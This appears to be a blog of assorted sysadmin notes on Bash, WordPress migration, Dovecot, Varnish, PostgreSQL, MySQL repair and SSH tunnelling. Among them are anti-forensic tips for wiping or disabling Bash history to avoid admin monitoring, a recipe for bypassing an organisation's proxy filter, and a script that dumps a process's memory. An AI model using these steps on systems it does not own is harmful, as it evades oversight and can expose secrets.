Put this in a file (e.g. "dump-all-memory-of-pid.sh") and make it executable
usage: ./dump-all-memory-of-pid.sh [pid]
The output is printed to files with the names: pid-startaddress-stopaddress.dump
Dependencies: gdb
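The script itself is not reproduced here; a minimal sketch (assuming the usual /proc/<pid>/maps layout and gdb's "dump memory" command) could look like this:
#!/bin/bash
# dump-all-memory-of-pid.sh (sketch): dump every writable memory region of a process
pid=$1
grep rw-p "/proc/$pid/maps" \
| awk '{split($1,a,"-"); print a[1], a[2]}' \
| while read start stop; do
    gdb --batch --pid "$pid" \
        -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"
done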
Get the PID of your process:
pgrep -uroot process
Dump the process's memory:
mkdir /tmp/process_dump && cd /tmp/process_dump && sh /path/to/dump-all-memory-of-pid.sh [pid]
expression1 && expression2 - true if both expression1 and expression2 are true.
if [ ! -z "$var" ] && [ -e "$var" ]; then
echo "'$var' is non-empty and the file exists"
fi
if [[ -n "$var" && -e "$var" ]] ; then
echo "'$var' is non-empty and the file exists"
fi
Subtract two variables in Bash :
count=$(($number1-$number2))
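A quick check you can paste into a shell:
number1=10; number2=3
count=$((number1 - number2))
echo "$count"   # prints 7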
How to check if a string contains a substring in Bash :
string='My long string'
if [[ $string == *"My long"* ]]; then
echo "It's there!"
fi
string='My string';
if [[ $string =~ "My" ]]
then
echo "It's there!"
fi
if grep -q foo <<<"$string"; then
echo "It's there"
fi
Compare Numbers in Linux Shell Script:
$num1 -eq $num2  checks if the 1st number is equal to the 2nd number
$num1 -ge $num2  checks if the 1st number is greater than or equal to the 2nd number
$num1 -gt $num2  checks if the 1st number is greater than the 2nd number
$num1 -le $num2  checks if the 1st number is less than or equal to the 2nd number
$num1 -lt $num2  checks if the 1st number is less than the 2nd number
$num1 -ne $num2  checks if the 1st number is not equal to the 2nd number
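For example, combining two of these numeric tests in a script:
num1=5; num2=9
if [ "$num1" -lt "$num2" ] && [ "$num1" -ne 0 ]; then
  echo "$num1 is less than $num2 and is not zero"
fi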
Compare Strings in Linux Shell Script:
$var1 = $var2   checks if var1 is the same as string var2
$var1 != $var2  checks if var1 is not the same as var2
$var1 < $var2   checks if var1 is less than var2
$var1 > $var2   checks if var1 is greater than var2
-n $var1        checks if var1 has a length greater than zero
-z $var1        checks if var1 has a length of zero
File comparison in Linux Shell Script
-d $file   checks if the file exists and is a directory
-e $file   checks if the file exists on the system
-w $file   checks if the file exists on the system and is writable
-r $file   checks if the file exists on the system and is readable
-s $file   checks if the file exists on the system and is not empty
-f $file   checks if the file exists on the system and is a regular file
-O $file   checks if the file exists on the system and is owned by the current user
-G $file   checks if the file exists and its group matches the current user's group
-x $file   checks if the file exists on the system and is executable
$fileA -nt $fileB   checks if file A is newer than file B
$fileA -ot $fileB   checks if file A is older than file B
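For example, combining a few of these file tests (the path is only an illustration):
file="/etc/passwd"
if [ -e "$file" ] && [ -r "$file" ] && [ -s "$file" ]; then
  echo "$file exists, is readable and is not empty"
fi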
First, you need to create a new MySQL database on the new server, then export the old MySQL database from the old server and import it into the new database on the new server. You can then modify all WordPress site URLs in the MySQL database tables using phpMyAdmin. Here are the steps to follow.
Old URL http://oldsite.com
New URL http://newsite.com
Log into your phpMyAdmin profile
Select the database you would like to edit
Execute the following SQL queries
# main replace
UPDATE wp_options SET option_value = replace(option_value, 'http://www.oldsite.com', 'http://www.newsite.com') WHERE option_name = 'home' OR option_name = 'siteurl';
# replace www and non-ssl
UPDATE wp_posts SET guid = replace(guid, 'http://www.oldsite.com', 'http://www.newsite.com');
UPDATE wp_posts SET post_content = replace(post_content, 'http://www.oldsite.com', 'http://www.newsite.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'http://www.oldsite.com', 'http://www.newsite.com');
UPDATE wp_options SET option_value = replace(option_value, 'https://www.oldsite.com', 'http://www.newsite.com') WHERE option_name = 'home' OR option_name = 'siteurl';
# replace www & SSL
UPDATE wp_posts SET guid = replace(guid, 'https://www.oldsite.com', 'https://www.newsite.com');
UPDATE wp_posts SET post_content = replace(post_content, 'https://www.oldsite.com', 'https://www.newsite.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'https://www.oldsite.com', 'https://www.newsite.com');
UPDATE wp_options SET option_value = replace(option_value, 'http://oldsite.com', 'https://newsite.com') WHERE option_name = 'home' OR option_name = 'siteurl';
# replace non-www
UPDATE wp_posts SET guid = replace(guid, 'http://oldsite.com', 'http://newsite.com');
UPDATE wp_posts SET post_content = replace(post_content, 'http://oldsite.com', 'http://newsite.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'http://oldsite.com', 'http://newsite.com');
UPDATE wp_options SET option_value = replace(option_value, 'https://oldsite.com', 'http://newsite.com') WHERE option_name = 'home' OR option_name = 'siteurl';
# replace non-www and SSL
UPDATE wp_posts SET guid = replace(guid, 'https://oldsite.com', 'https://newsite.com');
UPDATE wp_posts SET post_content = replace(post_content, 'https://oldsite.com', 'https://newsite.com');
UPDATE wp_postmeta SET meta_value = replace(meta_value, 'https://oldsite.com', 'https://newsite.com');
- Once you have modified the URLs (and the table prefix, if yours differs from wp_), you can run each SQL query by pressing the Go button at the bottom.
The next step is updating your WordPress config file (wp-config.php) to reflect the above changes. The configuration file should be in your web document root. You need to change the username, password, database name, and host values. Here are the steps to follow.
Updating your wp-config.php file
Using your hosting account editor, open your wp-config.php file.
Add two lines to the file which defines the new location of your website.
define('WP_HOME','http://mynewsite.com');
define('WP_SITEURL','http://mynewsite.com');
Locate the section that looks like this:
define('DB_NAME', 'yourdbnamehere');
/** MySQL database username */
define('DB_USER', 'usernamehere');
/** MySQL database password */
define('DB_PASSWORD', 'passwordhere');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Note: enter the database information for your database as follows
yourdbnamehere is your MySQL database name
usernamehere is your MySQL database username
passwordhere is your MySQL password
localhost is your MySQL host name
Make sure that user listing is configured for your userdb; replication requires it to find the list of users that are periodically replicated:
doveadm user '*'
This command must list all users.
I) Enable the replication plugins globally. Most likely you'll need to do this in 10-mail.conf: mail_plugins = $mail_plugins notify replication
II) Then in conf.d/30-dsync.conf :
service aggregator {
fifo_listener replication-notify-fifo {
user = vmail
}
unix_listener replication-notify {
user = vmail
}
}
service replicator {
process_min_avail = 1
unix_listener replicator-doveadm {
mode = 0600
user = vmail
}
}
replication_max_conns = 10
service doveadm {
user = vmail
inet_listener {
# port to listen on
port = $port
# enable SSL
ssl = yes
}
}
doveadm_port = $port
doveadm_password = "$password"
#same password on the other
plugin {
mail_replica = tcps:$targethostname:$port
#be sure to use the same name as the one provided for the ssl cert.
}
service config {
unix_listener config {
user = vmail
}
}
IV) service dovecot restart
V) Do the same for the other master and replace $targethostname by the 1st one you configured
VI) If the configuration is correct, run the following to check the syncing status: doveadm replicator status '*'
You should see that syncing is in progress.
doveadm replicator commands:
Replicate a given email account manually doveadm replicator replicate 'email'
Replicate a given email account manually IN FULL doveadm replicator replicate -f 'email'
Check replication status. Also works without the email parameter. doveadm replicator status 'email'
If you have duplicates (use with care): doveadm deduplicate -u user@domain.com -m ALL
In this article I'll show you an alternative to Google Docs: CryptPad.
In your enterprise you don't want your employees to share your documentation with someone external.
But many of them will use Google Docs if you don't deploy an alternative solution.
So Google has access to all your information.
Here comes CryptPad! It has word processing, sheets, code, kanban, presentations, a whiteboard and even a drive!
Best of all, it is open source, actively maintained, and... has client-side encryption; more documentation here!
It's easily deployed in containers or as a standard installation with Node.
It doesn't provide anonymity, but it has a lot of other qualities.
WordPress VCL 4.0:
vcl 4.0;
# Based on: https://github.com/mattiasgeniar/varnish-4.0-configuration-templates/blob/master/default.vcl
import std;
import directors;
backend server1 { # Define one backend
.host = "127.0.0.1"; # IP or Hostname of backend
.port = "80"; # Port Apache or whatever is listening
.max_connections = 300; # That's it
.probe = {
#.url = "/"; # short easy way (GET /)
# We prefer to only do a HEAD /
.request =
"HEAD / HTTP/1.1"
"Host: localhost"
"Connection: close"
"User-Agent: Varnish Health Probe";
.interval = 5s; # check the health of each backend every 5 seconds
.timeout = 1s; # timing out after 1 second.
.window = 5; # If 3 out of the last 5 polls succeeded the backend is considered healthy, otherwise it will be marked as sick
.threshold = 3;
}
.first_byte_timeout = 300s; # How long to wait before we receive a first byte from our backend?
.connect_timeout = 5s; # How long to wait for a backend connection?
.between_bytes_timeout = 2s; # How long to wait between bytes received from our backend?
}
acl purge {
# ACL we'll use later to allow purges
"localhost";
"127.0.0.1";
"::1";
}
/*
acl editors {
# ACL to honor the "Cache-Control: no-cache" header to force a refresh but only from selected IPs
"localhost";
"127.0.0.1";
"::1";
}
*/
sub vcl_init {
# Called when VCL is loaded, before any requests pass through it.
# Typically used to initialize VMODs.
new vdir = directors.round_robin();
vdir.add_backend(server1);
# vdir.add_backend(server...);
# vdir.add_backend(servern);
}
sub vcl_recv {
# Called at the beginning of a request, after the complete request has been received and parsed.
# Its purpose is to decide whether or not to serve the request, how to do it, and, if applicable,
# which backend to use.
# also used to modify the request
set req.backend_hint = vdir.backend(); # send all traffic to the vdir director
# Normalize the header, remove the port (in case you're testing this on various TCP ports)
set req.http.Host = regsub(req.http.Host, ":[0-9]+", "");
# Remove the proxy header (see https://httpoxy.org/#mitigate-varnish)
unset req.http.proxy;
# Normalize the query arguments
set req.url = std.querysort(req.url);
# Allow purging
if (req.method == "PURGE") {
if (!client.ip ~ purge) { # purge is the ACL defined at the beginning
# Not from an allowed IP? Then die with an error.
return (synth(405, "This IP is not allowed to send PURGE requests."));
}
# If you got this stage (and didn't error out above), purge the cached result
return (purge);
}
# Only deal with "normal" types
if (req.method != "GET" &&
req.method != "HEAD" &&
req.method != "PUT" &&
req.method != "POST" &&
req.method != "TRACE" &&
req.method != "OPTIONS" &&
req.method != "PATCH" &&
req.method != "DELETE") {
/* Non-RFC2616 or CONNECT which is weird. */
/*Why send the packet upstream, while the visitor is using a non-valid HTTP method? */
return (synth(404, "Non-valid HTTP method!"));
}
# Implementing websocket support (https://www.varnish-cache.org/docs/4.0/users-guide/vcl-example-websockets.html)
if (req.http.Upgrade ~ "(?i)websocket") {
return (pipe);
}
# Only cache GET or HEAD requests. This makes sure the POST requests are always passed.
if (req.method != "GET" && req.method != "HEAD") {
return (pass);
}
# Some generic URL manipulation, useful for all templates that follow
# First remove URL parameters used to track effectiveness of online marketing campaigns
if (req.url ~ "(\?|&)(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=") {
set req.url = regsuball(req.url, "(utm_[a-z]+|gclid|cx|ie|cof|siteurl|fbclid)=[-_A-z0-9+()%.]+&?", "");
set req.url = regsub(req.url, "[?|&]+$", "");
}
# Strip hash, server doesn't need it.
if (req.url ~ "\#") {
set req.url = regsub(req.url, "\#.*$", "");
}
# Strip a trailing ? if it exists
if (req.url ~ "\?$") {
set req.url = regsub(req.url, "\?$", "");
}
# Some generic cookie manipulation, useful for all templates that follow
# Remove the "has_js" cookie
set req.http.Cookie = regsuball(req.http.Cookie, "has_js=[^;]+(; )?", "");
# Remove any Google Analytics based cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__utm.=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "_ga=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "_gat=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmctr=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmcmd.=[^;]+(; )?", "");
set req.http.Cookie = regsuball(req.http.Cookie, "utmccn.=[^;]+(; )?", "");
# Remove DoubleClick offensive cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__gads=[^;]+(; )?", "");
# Remove the Quant Capital cookies (added by some plugin, all __qca)
set req.http.Cookie = regsuball(req.http.Cookie, "__qc.=[^;]+(; )?", "");
# Remove the AddThis cookies
set req.http.Cookie = regsuball(req.http.Cookie, "__atuv.=[^;]+(; )?", "");
# Remove a ";" prefix in the cookie if present
set req.http.Cookie = regsuball(req.http.Cookie, "^;\s*", "");
# Are there cookies left with only spaces or that are empty?
if (req.http.cookie ~ "^\s*$") {
unset req.http.cookie;
}
#if (req.http.Cache-Control ~ "(?i)no-cache") {
#if (req.http.Cache-Control ~ "(?i)no-cache" && client.ip ~ editors) { # create the acl editors if you want to restrict the Ctrl-F5
# http://varnish.projects.linpro.no/wiki/VCLExampleEnableForceRefresh
# Ignore requests via proxy caches and badly behaved crawlers
# like msnbot that send no-cache with every request.
# if (! (req.http.Via || req.http.User-Agent ~ "(?i)bot" || req.http.X-Purge)) {
# #set req.hash_always_miss = true; # Doesn't seems to refresh the object in the cache
# return (purge); # Couple this with restart in vcl_purge and X-Purge header to avoid loops
# }
#}
# Large static files are delivered directly to the end-user without
# waiting for Varnish to fully read the file first.
# Varnish 4 fully supports Streaming, so set do_stream in vcl_backend_response()
if (req.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
unset req.http.Cookie;
return (hash);
}
# Remove all cookies for static files
# A valid discussion could be held on this line: do you really need to cache static files that don't cause load? Only if you have memory left.
# Sure, there's disk I/O, but chances are your OS will already have these files in their buffers (thus memory).
# Before you blindly enable this, have a read here: https://ma.ttias.be/stop-caching-static-files/
if (req.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
unset req.http.Cookie;
return (hash);
}
# Send Surrogate-Capability headers to announce ESI support to backend
set req.http.Surrogate-Capability = "key=ESI/1.0";
if (req.http.Authorization) {
# Not cacheable by default
return (pass);
}
return (hash);
}
sub vcl_pipe {
# Called upon entering pipe mode.
# In this mode, the request is passed on to the backend, and any further data from both the client
# and backend is passed on unaltered until either end closes the connection. Basically, Varnish will
# degrade into a simple TCP proxy, shuffling bytes back and forth. For a connection in pipe mode,
# no other VCL subroutine will ever get called after vcl_pipe.
# Note that only the first request to the backend will have
# X-Forwarded-For set. If you use X-Forwarded-For and want to
# have it set for all requests, make sure to have:
# set bereq.http.connection = "close";
# here. It is not set by default as it might break some broken web
# applications, like IIS with NTLM authentication.
# set bereq.http.Connection = "Close";
# Implementing websocket support (https://www.varnish-cache.org/docs/4.0/users-guide/vcl-example-websockets.html)
if (req.http.upgrade) {
set bereq.http.upgrade = req.http.upgrade;
}
return (pipe);
}
sub vcl_pass {
# Called upon entering pass mode. In this mode, the request is passed on to the backend, and the
# backend's response is passed on to the client, but is not entered into the cache. Subsequent
# requests submitted over the same client connection are handled normally.
# return (pass);
}
# The data on which the hashing will take place
sub vcl_hash {
# Called after vcl_recv to create a hash value for the request. This is used as a key
# to look up the object in Varnish.
hash_data(req.url);
if (req.http.host) {
hash_data(req.http.host);
} else {
hash_data(server.ip);
}
# hash cookies for requests that have them
if (req.http.Cookie) {
hash_data(req.http.Cookie);
}
}
sub vcl_hit {
# Called when a cache lookup is successful.
if (obj.ttl >= 0s) {
# A pure unadultered hit, deliver it
return (deliver);
}
# https://www.varnish-cache.org/docs/trunk/users-guide/vcl-grace.html
# When several clients are requesting the same page Varnish will send one request to the backend and place the others on hold while fetching one copy from the backend. In some products this is called request coalescing and Varnish does this automatically.
# If you are serving thousands of hits per second the queue of waiting requests can get huge. There are two potential problems - one is a thundering herd problem - suddenly releasing a thousand threads to serve content might send the load sky high. Secondly - nobody likes to wait. To deal with this we can instruct Varnish to keep the objects in cache beyond their TTL and to serve the waiting requests somewhat stale content.
# We have no fresh fish. Lets look at the stale ones.
if (std.healthy(req.backend_hint)) {
# Backend is healthy. Limit age to 10s.
if (obj.ttl + 10s > 0s) {
#set req.http.grace = "normal(limited)";
return (deliver);
} else {
# No candidate for grace. Fetch a fresh object.
return (fetch);
}
} else {
# backend is sick - use full grace
if (obj.ttl + obj.grace > 0s) {
#set req.http.grace = "full";
return (deliver);
} else {
# no graced object.
return (fetch);
}
}
# fetch & deliver once we get the result
return (fetch); # Dead code, keep as a safeguard
}
sub vcl_miss {
# Called after a cache lookup if the requested document was not found in the cache. Its purpose
# is to decide whether or not to attempt to retrieve the document from the backend, and which
# backend to use.
return (fetch);
}
# Handle the HTTP request coming from our backend
sub vcl_backend_response {
# Called after the response headers has been successfully retrieved from the backend.
# Pause ESI request and remove Surrogate-Control header
if (beresp.http.Surrogate-Control ~ "ESI/1.0") {
unset beresp.http.Surrogate-Control;
set beresp.do_esi = true;
}
# Enable cache for all static files
# The same argument as the static caches from above: monitor your cache size, if you get data nuked out of it, consider giving up the static file cache.
# Before you blindly enable this, have a read here: https://ma.ttias.be/stop-caching-static-files/
if (bereq.url ~ "^[^?]*\.(7z|avi|bmp|bz2|css|csv|doc|docx|eot|flac|flv|gif|gz|ico|jpeg|jpg|js|less|mka|mkv|mov|mp3|mp4|mpeg|mpg|odt|otf|ogg|ogm|opus|pdf|png|ppt|pptx|rar|rtf|svg|svgz|swf|tar|tbz|tgz|ttf|txt|txz|wav|webm|webp|woff|woff2|xls|xlsx|xml|xz|zip)(\?.*)?$") {
unset beresp.http.set-cookie;
}
# Large static files are delivered directly to the end-user without
# waiting for Varnish to fully read the file first.
# Varnish 4 fully supports Streaming, so use streaming here to avoid locking.
if (bereq.url ~ "^[^?]*\.(7z|avi|bz2|flac|flv|gz|mka|mkv|mov|mp3|mp4|mpeg|mpg|ogg|ogm|opus|rar|tar|tgz|tbz|txz|wav|webm|xz|zip)(\?.*)?$") {
unset beresp.http.set-cookie;
set beresp.do_stream = true; # Check memory usage it'll grow in fetch_chunksize blocks (128k by default) if the backend doesn't send a Content-Length header, so only enable it for big objects
}
# Sometimes, a 301 or 302 redirect formed via Apache's mod_rewrite can mess with the HTTP port that is being passed along.
# This often happens with simple rewrite rules in a scenario where Varnish runs on :80 and Apache on :8080 on the same box.
# A redirect can then often redirect the end-user to a URL on :8080, where it should be :80.
# This may need finetuning on your setup.
#
# To prevent accidental replace, we only filter the 301/302 redirects for now.
if (beresp.status == 301 || beresp.status == 302) {
set beresp.http.Location = regsub(beresp.http.Location, ":[0-9]+", "");
}
# Set 2min cache if unset for static files
if (beresp.ttl <= 0s || beresp.http.Set-Cookie || beresp.http.Vary == "*") {
set beresp.ttl = 120s; # Important, you shouldn't rely on this, SET YOUR HEADERS in the backend
set beresp.uncacheable = true;
return (deliver);
}
# Allow stale content, in case the backend goes down.
# make Varnish keep all objects for 6 hours beyond their TTL
set beresp.grace = 6h;
return (deliver);
}
# The routine when we deliver the HTTP request to the user
# Last chance to modify headers that are sent to the client
sub vcl_deliver {
# Called before a cached object is delivered to the client.
if (obj.hits > 0) { # Add debug header to see if it's a HIT/MISS and the number of hits, disable when not needed
set resp.http.X-Cache = "HIT";
} else {
set resp.http.X-Cache = "MISS";
}
# Please note that obj.hits behaviour changed in 4.0, now it counts per objecthead, not per object
# and obj.hits may not be reset in some cases where bans are in use. See bug 1492 for details.
# So take hits with a grain of salt
set resp.http.X-Cache-Hits = obj.hits;
# Remove some headers: PHP version
unset resp.http.X-Powered-By;
# Remove some headers: Apache version & OS
unset resp.http.Server;
unset resp.http.X-Drupal-Cache;
unset resp.http.X-Varnish;
unset resp.http.Via;
unset resp.http.Link;
unset resp.http.X-Generator;
return (deliver);
}
sub vcl_purge {
# Only handle actual PURGE HTTP methods, everything else is discarded
if (req.method == "PURGE") {
# restart request
set req.http.X-Purge = "Yes";
return (restart);
}
}
sub vcl_synth {
if (resp.status == 720) {
# We use this special error status 720 to force redirects with 301 (permanent) redirects
# To use this, call the following from anywhere in vcl_recv: return (synth(720, "http://host/new.html"));
set resp.http.Location = resp.reason;
set resp.status = 301;
return (deliver);
} elseif (resp.status == 721) {
# And we use error status 721 to force redirects with a 302 (temporary) redirect
# To use this, call the following from anywhere in vcl_recv: return (synth(721, "http://host/new.html"));
set resp.http.Location = resp.reason;
set resp.status = 302;
return (deliver);
}
return (deliver);
}
sub vcl_fini {
# Called when VCL is discarded only after all requests have exited the VCL.
# Typically used to clean up VMODs.
return (ok);
}
Connect to a database: run psql, then \c databasename (or psql -d databasename)
Describe: \d
Help: \?
Exit: \q
Creating Roles
PostgreSQL allows access to databases based on roles; they are similar to 'users' in a Linux system. We can also create a set of roles, which is similar to 'groups' in Linux, and based on these roles a user's access is determined. A role is created globally, so we don't have to create it again for another database on the same server.
To create a role, first connect to the database and then use the CREATE USER command: postgres=# CREATE USER test;
Or we can also use the following: postgres=# CREATE ROLE test;
To create a user with a password: postgres=# CREATE USER test PASSWORD 'enter password here';
Check all roles postgres=# \du
Delete a role postgres=# DROP ROLE test;
Create a new Database postgres=# CREATE DATABASE sysa;
Delete a database postgres=# DROP DATABASE sysa;
List all database postgres=# \l
or postgres=# \list
Connect to a database: $ sudo -i -u test
then connect to the database with the following command: $ psql -d sysa
Change to another database
Once connected to a database, we can also switch to another database without having to repeat the whole process of logging in as the user and then connecting. We use the following command: sysa=> \connect new_database
Create Table
To create a table, first connect to the desired database where the table is to be created. Next create the table with the command: sysa=> CREATE TABLE USERS (Serial_No int, First_Name varchar, Last_Name varchar);
Now insert some records into it: sysa=> INSERT INTO USERS VALUES (1, 'Dan', 'Prince');
Check the table's data: sysa=> SELECT * FROM USERS;
& it will produce all the inserted data from the table USERS.
Delete a table sysa=> DROP TABLE USERS;
List all the tables in a database sysa=> \dt
Adding a column to a table sysa=> ALTER TABLE USERS ADD date_of_birth date;
Updating a row sysa=> UPDATE USERS SET date_of_birth = '05-09-1999' WHERE Serial_No = '1'; sysa=> SELECT * FROM USERS;
Remove a column sysa=> ALTER TABLE USERS DROP date_of_birth;
Remove a row sysa=> DELETE FROM USERS WHERE Serial_No = '1';
The tag can be any string, uppercase or lowercase, though most people use uppercase by convention.
The tag will not be considered as a Here tag if there are other words in that line. In this case, it will merely be considered part of the string. The tag should be by itself on a separate line, to be considered a tag.
The tag should have no leading or trailing spaces in that line to be considered a tag. Otherwise it will be considered as part of the string.
1. Assign multi-line string to a shell variable
$ sql=$(cat <<EOF
SELECT foo, bar FROM db
WHERE foo='baz'
EOF
)
The $sql variable now holds the new-line characters too. You can verify with echo -e "$sql".
2. Pass multi-line string to a pipe in Bash
$ cat <<EOF | grep 'b' | tee b.txt
foo
bar
baz
EOF
4.
$ cat >> test <<HERE
> Hello world HERE <-- Not by itself on a separate line -> not considered end of string
> This is a test
> HERE <-- Leading space, so not considered end of string
> and a new line
> HERE <-- Now we have the end of the string
5.
cat <<EOF >>brightup.sh
#!/bin/sh
# Created on $(date) # note: the substitution is evaluated when the heredoc is expanded, before cat writes the file
echo "\$HOME will not be evaluated because it is backslash-escaped"
EOF
While upgrading a MySQL 8 database to the latest version, I got an error with the sys_config table in the sys schema.
If you're unable to start MySQL 8, even MySQL's REPAIR TABLE may be unable to repair the sys table.
You can try it, but if it fails, here is the procedure to repair a failed upgrade for MySQL 8.
- Start MySQL:
Add upgrade=MINIMAL to the my.cnf file (mysql_upgrade no longer exists), then:
systemctl start mysqld
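For clarity, the option goes in the [mysqld] section of my.cnf (a minimal sketch; the exact file path depends on your distribution):
[mysqld]
upgrade=MINIMAL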
- First dump all databases:
mysqldump -u root -p --all-databases > alldb.sql
Look up the documentation for mysqldump. You may want to use some of the options mentioned in comments:
mysqldump -u root -p --opt --all-databases > alldb.sql
mysqldump -u root -p --all-databases --skip-lock-tables
Check that routines & triggers are also saved (you may need to add --routines and --events).
- Stop MySQL:
systemctl stop mysqld
- Remove all the databases in the MySQL data directory:
rm -rf database/*
- Reinitialise:
Remove upgrade=MINIMAL from my.cnf, then run:
mysqld --initialize
Grab the new temporary root password from the log file: cat log/mysqld.log
- Start MySQL
systemctl start mysqld
- Change root password
mysql -u root -p
Enter the temporary password.
Change the root password to the real one: ALTER USER 'root'@'localhost' IDENTIFIED BY 'PASSWORD';
- Import the databases
mysql -u root -p < alldb.sql
It's done, you now have a clean MySQL 8.
PS: I recommend dumping your databases before any upgrade.
Logitech wireless devices have vulnerabilities and you need to patch your devices yourself, because the manufacturer doesn't really know which devices are patched! Here are the disclosure and the exploits GitHub repo.
A little article on ZDNet.
Tools for the exploits
Here is a tool to exploit the vulnerabilities, and another one here.
Finally, the patch.
In the end, Logitech's policy is cumbersome and I don't recommend using Logitech wireless devices.
The exploit seems to work from 100 meters according to Mengs, and Logitech says you should protect access to your devices?! Here is the patch.
Last release of BlackArch download here version : 2020.12.01
A ChangeLog of the Full-ISO-2020.12.01:
- added more than 100 new tools
- renamed 'live-iso' to 'full-iso'
- updated blackarch-installer to v1.2.16
- included Linux kernel 5.9.11
- adapted ISO creation to the new archiso version (work in progress)
- removed unnecessary files from the ISO env
- QA'ed and fixed a lot of packages (runtime exec)
- updated all vim plugins and improved vim config options
- updated all blackarch tools and packages including config files
- updated all system packages
- updated all window manager menus (awesome, fluxbox, openbox)
Last release of Kali download here version : 2020.4
Last release of Parrot download here version : 2020-05 | Parrot 4.10
Last release of Backbox download here version : 2020-05-15 | Backbox linux 7
Clear Bash history completely :
Type the following command to clear all your Bash history: history -cw
-c Clear the history list
-w Write out the current history to the history file
Remove a certain line from Bash history :
Type the following command to remove a certain line (e.g. 352) from the Bash history file: history -dw 352
-d Delete specified line from the history
Clear current session history :
Type the following command to clear the Bash history of the current session only: history -r
Execute a command without saving it in the Bash history : 'space'command
Put a space in front of your command and it won't be saved in the Bash history (note: this requires HISTCONTROL to include ignorespace or ignoreboth).
Don’t save commands in Bash history for current session : unset HISTFILE
Unsetting HISTFILE will cause any commands that you have executed in the current shell session not to be written in your bash_history file upon logout
Change in the current session the path of the history file : export HISTFILE=/dev/null
Three ways to remove only the current session's Bash history and leave older history untouched:
kill -9 $$
unset HISTFILE && exit
history -r && exit
The commands above are not guaranteed to leave no trace.
Be aware that if you make a program/script listen on a port without hiding it, it can be monitored.
Also, the commands you type can be monitored (the shell can be a chroot jail, for example), and logs can be sent to a syslog server and/or the admin can be notified, so be careful. source 1 source 2
!!:s/find/replace - last command, substitute find with replace
Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.)
For example:
echo 'one' 'two'
# "one two"
echo !!:2
# "two"
If you know the number given in the history for a particular command, you can pretty much take any argument of that command using the following syntax.
Use the following to take the second argument from the third command in the history: !3:2
Use the following to take the third argument from the fifth-to-last command in the history: !-5:3
Using a minus sign, you ask it to traverse from the last command of the history.
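A quick illustration of these word designators (the history numbers here are hypothetical; they depend on your own history):
echo alpha beta gamma   # suppose this is command number 3 in your history
echo !3:2               # expands to: echo beta
echo !-5:3              # third argument of the fifth-to-last command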
var string = "foo",
substring = "oo";
string.includes(substring)
includes doesn’t have IE support, though. In an ES5 or older environment, String.prototype.indexOf, which returns −1 when it doesn’t find the substring, can be used instead:
var string = "foo",
substring = "oo";
string.indexOf(substring) !== -1
Note that String.prototype.includes itself does not work in Internet Explorer or some other old browsers with no or incomplete ES6 support. To make it work in old browsers, you may wish to use a transpiler like Babel, a shim library like es6-shim, or the includes polyfill from MDN.
To change all permissions to the same type recursively: chmod -R 775 /folder
To change all the directories to 755 (drwxr-xr-x): find /folder -type d -exec chmod 755 {} \;
To change all the files to 644 (-rw-r--r--): find /folder -type f -exec chmod 644 {} \;
An SSH tunnel consists of an encrypted tunnel created through an SSH protocol connection. An SSH tunnel can be used to transfer unencrypted traffic over a network through an encrypted channel. For example, we can use an SSH tunnel to securely transfer files between an FTP server and a client even though the FTP protocol itself is not encrypted. SSH tunnels also provide a means to bypass firewalls that prohibit or filter certain internet services. For example, an organization may block certain sites using their proxy filter. But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server via the external SSH server. I will describe this scenario in detail in a little while.
To set up an SSH tunnel, a given port of one machine needs to be forwarded (which I am going to talk about in a little while) to a port on the other machine which will be the other end of the tunnel. Once the SSH tunnel has been established, the user can connect to the earlier specified port on the first machine to access the network service.
Port Forwarding
SSH tunnels can be created in several ways using different kinds of port forwarding mechanisms. Ports can be forwarded in three ways.
Local port forwarding
Remote port forwarding
Dynamic port forwarding
I didn't explain what port forwarding is. I found Wikipedia's definition more explanatory:
Port forwarding or port mapping is a name given to the combined technique of
1. translating the address and/or port number of a packet to a new destination
2. possibly accepting such packet(s) in a packet filter (firewall)
3. forwarding the packet according to the routing table.
Here the first technique will be used in creating an SSH tunnel. When a client application connects to the local port (local endpoint) of the SSH tunnel and transfers data, the data will be forwarded to the remote end by translating the host and port values to those of the remote end of the channel.
So with that, let's see how SSH tunnels can be created using forwarded ports, with some examples.
Tunnelling with Local port forwarding
Let's say that yahoo.com is being blocked using a proxy filter in the university (for the sake of this example; I cannot think of any valid reason why Yahoo would be blocked). An SSH tunnel can be used to bypass this restriction. Let's name my machine at the university 'work' and my home machine 'home'. 'home' needs to have a public IP for this to work, and I am running an SSH server on my home machine. The following diagram illustrates the scenario.
To create the SSH tunnel execute following from ‘work’ machine.
ssh -L 9001:yahoo.com:80 home
The -L switch indicates that a local port forward needs to be created. The switch syntax is as follows.
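In general form (angle brackets are placeholders):
ssh -L <local-port>:<destination-host>:<destination-port> <gateway>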
